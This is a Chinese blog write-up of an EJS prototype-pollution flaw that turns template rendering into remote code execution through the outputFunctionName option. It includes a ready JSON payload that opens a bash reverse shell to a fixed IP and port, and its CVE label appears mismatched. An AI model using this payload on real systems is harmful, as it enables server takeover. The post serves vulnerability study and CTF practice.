[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)

原创 已于 2022-04-06 21:27:46 修改 · 3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #nodejs

于 2022-04-06 21:24:35 首次发布
本文深入剖析了EJS模板引擎中的CVE-2019-10744漏洞,该漏洞允许攻击者通过操纵opts.outputFunctionName属性构造恶意代码,导致远程代码执行。讲解了漏洞成因、利用流程及payload构造,揭示了渲染引擎的安全风险。
EJS _CVE-2019-10744(outputFunctionName)

在EJS引擎当中,存在一个属性opts.outputFunctionName

(注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用)

读源码

ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。

【以下代码为exports.render-----调用----->handleCache

首先调用了render的话(在我们做题时可以看到的表层函数)请添加图片描述
render调用的handleCache中跟进调用了compile(记住,关键点)
请添加图片描述
【以下代码包含在ejscompile函数中】

// 输出解析后的html字符串
语法:ejs.compile(str,options);
参数参数说明
str这个是用来渲染的数据展示区域
opstions这是个额外的参数配置,可以省略,详见后面

请添加图片描述请添加图片描述
恰巧this.source是拼接而成的,在包含opts.outputFunctionName时会将其包含在内,动态拼接一个js语句字符串,这是十分危险的,因为在后续步骤中,会利用this.src构造可调用函数。
请添加图片描述请添加图片描述
因此操纵opts.outputFunctionName即可构造预期函数,实现RCE。

如下图,compile在此处会被调用并作为返回值返回,导致渲染变为代码执行。
请添加图片描述
也就是说,我们对{}原型进行污染添加opts.outputFunctionName属性(主要为了污染opts)下的恶意代码,就能利用渲染函数render的调用链,转为代码执行。

Payload

由源码知,

this.source = prepended + this.source + appended;
prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';

构造合适的opts.outputFunctionName,

a=2333;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2

整理为

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2"}}
深入解析原型链污染漏洞(CVE-2019-10744):从原理到实战防御
weixin_43172311的博客
03-29 2546
‌攻击成本极低‌:仅需构造符合语法的JSON即可触发。影响范围广泛‌:所有依赖的库(如模板引擎、权限校验库)均可能被波及。防御核心思路‌:隔离用户输入与原型链,使用白名单过滤关键属性。‌立即行动‌:检查项目中所有涉及深度合并操作的代码(如配置合并、表单数据处理),并确保 lodash 版本≥4.17.12。
ejs默认配置 原型链污染
rev1ve的博客
01-06 1417
我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。不过其中大多数都使用。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。
ejs原型链污染rce分析
lastwinn的博客
02-07 1321
记录自己的所学以及理解
Nodejs原型链污染
蚁景网安学院
02-09 622
有一些人在学习JavaScript时会分不清Nodejs和JavaScript之间的区别,如果没有node,那么我们的JavaScript代码则由浏览器中的JavaScript解析器进行解析。 几乎所有的浏览器都配备了JavaScript的解析功能(最出名的就是google的v8), 这也是为什么我们能在f12中直接执行JavaScript的原因。
nodejs——原型链污染
最新发布
m0_73756016的博客
06-12 1514
参考滑动验证页面。
NodeJS原型链污染
Aiwin的博客
05-11 1561
NodeJS原型链污染
CTFshow-WEB入门-node.js
feng的博客
04-01 3052
前言 刚学了2天的node.js,我还是太菜了官方文档看的太懵,听学长说node.js的漏洞就那些,不用那么专注的学习。但是考虑到我对于javascript和node.js都实在不太懂,因此打算一遍做题,一遍学node.js的基础知识。 web334 主要关注这段代码: var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
基于ExpressJS的全栈NodeJS开发框架
标题“server:基于ExpressJS构建的全栈NodeJS服务器,具有许多可加快开发速度的优点”揭示了一个在现代Web开发中极具价值的技术实践方向:即通过封装和增强ExpressJS这一广泛使用的Node.js Web框架,构建一个更高效...
基于Node.js的Web邮件系统nodemail演示
从标题“基于 nodejs 的网络邮件演示”可以看出,该项目并非用于生产环境的专业邮件服务器,而是一个教学性质或原型验证性质的轻量级 Web 应用。 项目的核心技术栈包括 Node.js、Express 框架(隐含在 app.js 中)...
基于Node.js的轻量级Bug管理系统dogM
结合描述中提到的“教条”与“基础nodejs bms系统”,可以推测该系统可能强调简洁性、遵循某种开发哲学或设计原则(即“教条”所暗示的理念),并以实现基本但完整的 Bug 管理功能为核心出发点,适合作为学习项目、...
浅析嵌入式 JS 模板引擎之EJS
01-08
EJS是一套既简单又高效的嵌入式 JS模板语言,可以帮我们利用普通的 JS 代码生成 HTML 页面。其历史悠久,曾一度得到些许大佬的青睐,现在虽然没有vue、react这些项目流行,但其还是有一定的使用场合和学习价值的。 EJS后缀名为”ejsEJS 支持我们把JS代码直接写在标签内 EJS 能够缓存 JS函数的中间代码,使执行速度得到极大的提升 EJS 调错极其简单:因为它所有错误都是普通的 JS 异常,而且也会给我们输出异常发生的具体位置 EJS能够快速编译与绘制输出,并且其标签很简洁,如: EJS能够自定义分割符,如:用 替换 EJS同时支持服务器端和浏览器 JS 环境 EJS
24年前端面试 高频经典(答案版)
qq_53895518的博客
05-22 1109
WebPack是一个现代JS应用程序的静态模块打包工具。Webpack的主要功能包括:1. 模块打包:将项目中的所有模块(JavaScript、CSS、图片等)当作一个整体,通过依赖关系将它们打包成一个或多个静态资源文件。2. 依赖管理:Webpack可以分析模块之间的依赖关系,根据配置的入口文件找出所有依赖的模块,并将其整合到打包结果中。Webpack本身只能处理JavaScript模块,但通过加载器(Loader)
nodejs原型链污染
yink12138的博客
01-10 3479
nodejs原型链污染
浅谈 Nodejs原型链污染
weixin_63231007的博客
03-07 1704
nodejs原型链污染原理及利用
web安全Nodejs原型链污染分析
「 虚幻私塾」
02-14 949
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
nodejs原型链污染基础
qq_63928796的博客
02-06 900
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019年初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
Node.js基础+原型链污染
2301_79688134的博客
03-15 995
概述:简单来说Node.js就是运行在服务端的JavaScript,Node.js是一个基于Chrome JavaScript运行时建立的一个平台。
nodejs 原型链污染 ctf
10-16
Node.js 原型链污染是一种安全漏洞,攻击者可以通过修改对象的原型链来篡改对象的属性和方法,从而实现攻击目的。这种漏洞通常出现在使用第三方模块时,因为第三方模块可能会使用不安全的代码来处理用户输入数据。 攻击者可以通过构造恶意数据来触发原型链污染漏洞,例如: ```javascript const payload = '{"__proto__":{"isAdmin":true}}'; const obj = JSON.parse(payload); console.log(obj.isAdmin); // true ``` 在上面的代码中,我们构造了一个 JSON 字符串,其中包含一个 `__proto__` 属性,它的值是一个包含 `isAdmin` 属性的对象。当我们将这个 JSON 字符串解析成对象后,这个对象的原型链就被污染了,从而使得这个对象具有了 `isAdmin` 属性。 为了防止原型链污染漏洞,我们可以采取以下措施: 1. 使用 `Object.create(null)` 创建一个没有原型链的对象。 2. 使用 `Object.freeze()` 冻结对象,防止被修改。 3. 使用 `JSON.parse(JSON.stringify(obj))` 深拷贝对象,防止污染原始对象。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值